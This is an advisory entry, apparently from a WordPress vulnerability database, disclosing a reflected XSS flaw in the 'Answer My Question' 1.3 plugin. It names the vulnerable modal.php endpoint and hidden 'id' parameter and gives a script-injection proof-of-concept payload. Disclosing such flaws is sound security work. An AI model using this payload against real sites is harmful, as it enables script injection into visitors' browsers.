Answer My Question 1.3 - Cross-Site Scripting (XSS)



Proof of Concept
Host: 10.194.0.44
URL: http://10.194.0.44/wp-content/plugins/answer-my-question/modal.php
Parameter: Hidden Field [id]
Payload:  "><script>alert(1)</script>

Affects Plugin

References

URL https://wpvulndb.com/vulnerabilities/8669

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Leon Teale
Submitter Twitter leonteale
Views 5195
Verified No
WPVDB ID 8800

Timeline

Publicly Published 2017-04-24 (over 2 years ago)
Added 2017-05-02 (over 2 years ago)
Last Updated 2019-11-01 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin